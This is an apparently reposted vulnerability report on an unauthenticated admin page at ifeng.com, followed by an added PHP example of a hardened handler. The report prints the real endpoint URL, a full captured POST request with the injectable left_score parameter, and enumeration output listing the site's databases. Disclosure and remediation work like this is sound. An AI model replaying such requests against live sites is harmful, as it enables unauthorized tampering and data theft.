ifeng.com (凤凰网): unauthorized back-end access & SQL injection

2016-01-04 12:35

ifeng.com (凤凰网)

http://online.3g.ifeng.com/live/manager/ifeng_match_live.php?&match=7192

Unauthorized operation: articles can be modified and deleted directly.

Captured request for the injection:


POST /live/manager/ifeng_match_live.php? HTTP/1.1
Host: online.3g.ifeng.com
Content-Length: 96
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://online.3g.ifeng.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.22 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://online.3g.ifeng.com/live/manager/ifeng_match_live.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: null

left_score=111&right_score=111&submit=%E4%BF%AE%E6%94%B9%E5%BE%97%E5%88%86&act=editmatch&match=0

The left_score parameter

back-end DBMS: MySQL 5.0.11



available databases [3]:
[*] ifeng_live
[*] information_schema
[*] test

Solution:
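
An added example, not part of the original report and not ifeng's code: one way a handler for the act=editmatch request above could refuse unauthenticated callers and keep left_score, right_score and match out of the SQL text. The table `matches`, its columns, the session keys, the role name and both function names are assumptions.

```php
<?php
declare(strict_types=1);
// Hypothetical hardened handler for the act=editmatch request shown above.
// Assumed, not from the report: table `matches`, its columns, the session
// keys `uid` and `role`, and the role name `live_editor`.
function int_field(array $src, string $key, int $min, int $max): ?int
{
    // Accept only a decimal integer within range; anything else
    // (quotes, SQL fragments, arrays, missing keys) becomes null.
    $v = filter_var($src[$key] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $v === false ? null : $v;
}

function edit_match(PDO $db, array $session, array $post): int
{
    // 1. Authorization: the captured request carried "Cookie: null",
    //    so anything without an editor session is refused first.
    if (empty($session['uid']) || ($session['role'] ?? '') !== 'live_editor') {
        return 403;
    }
    // 2. Strict typing of every field that reaches the statement.
    $match = int_field($post, 'match', 0, PHP_INT_MAX);
    $left  = int_field($post, 'left_score', 0, 999);
    $right = int_field($post, 'right_score', 0, 999);
    if ($match === null || $left === null || $right === null) {
        return 400;
    }
    // 3. Bound parameters: values are sent as data, never as SQL text.
    $stmt = $db->prepare(
        'UPDATE matches SET left_score = :l, right_score = :r WHERE id = :m'
    );
    $stmt->execute([':l' => $left, ':r' => $right, ':m' => $match]);
    return 200;
}

// Constructed demo on an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE matches (id INTEGER PRIMARY KEY, left_score INT, right_score INT)');
$db->exec('INSERT INTO matches VALUES (7192, 0, 0)');
$editor = ['uid' => 1, 'role' => 'live_editor'];
$post = ['match' => '7192', 'left_score' => '111', 'right_score' => '111'];
var_dump(edit_match($db, [], $post));                                 // no session
var_dump(edit_match($db, $editor, ['left_score' => "111'"] + $post)); // non-integer score
var_dump(edit_match($db, $editor, $post));                            // valid edit
```

With the MySQL PDO driver, setting `PDO::ATTR_EMULATE_PREPARES` to `false` makes the server, not the client library, perform the parameter binding.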


Source: www.2cto.com/Article/201601/456196.html
